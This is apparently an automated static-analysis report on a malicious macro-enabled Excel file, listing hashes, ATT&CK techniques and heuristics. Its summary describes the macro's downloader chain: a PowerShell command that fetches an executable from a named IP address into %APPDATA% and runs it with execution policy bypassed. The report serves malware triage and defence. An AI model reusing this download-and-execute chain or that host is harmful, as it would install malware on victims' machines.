Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 b2ce2ad6d522621b…

MALICIOUS

Office (OOXML) / .XLSM

32.4 KB Created: 2022-01-01 15:05:54 UTC Authoring application: Microsoft Excel Online 16.0300
MD5: 8aae2f4a9b68e6458f4838b1d5e38878 SHA-1: 1118bfbdbcd96a9470cc490046bdc1efb490dc75 SHA-256: b2ce2ad6d522621b917ce77b362541bcfa0976bdcbbc36f1a57ec1c5d6199112
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell

The critical heuristic firing for Shell() calls in VBA, combined with the extracted VBA script, indicates malicious intent. The script reconstructs a PowerShell command to download a file from 'http://136.144.41.207/OnlyFun.exe' and save it as '%APPDATA%\ProcName'. It then executes this downloaded file using 'powershell.exe -ExecutionPolicy Bypass -NoProfile -File $env:APPDATA\ProcName'. A temporary batch file named 'Mphdjnjiec.bat' is created to orchestrate this execution. The script's obfuscation and the use of Shell() suggest a downloader functionality.

Heuristics 2

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
aaf0070159ba499fe03acad55034a163af5f6d6f9764d6b44916d5865bb69d53		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2315 bytes
vbaProject_00.bin
a17a79cdb5d232c53bc0fc50a0cbc04850d521d48df2bb845e51993a86734007		 vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.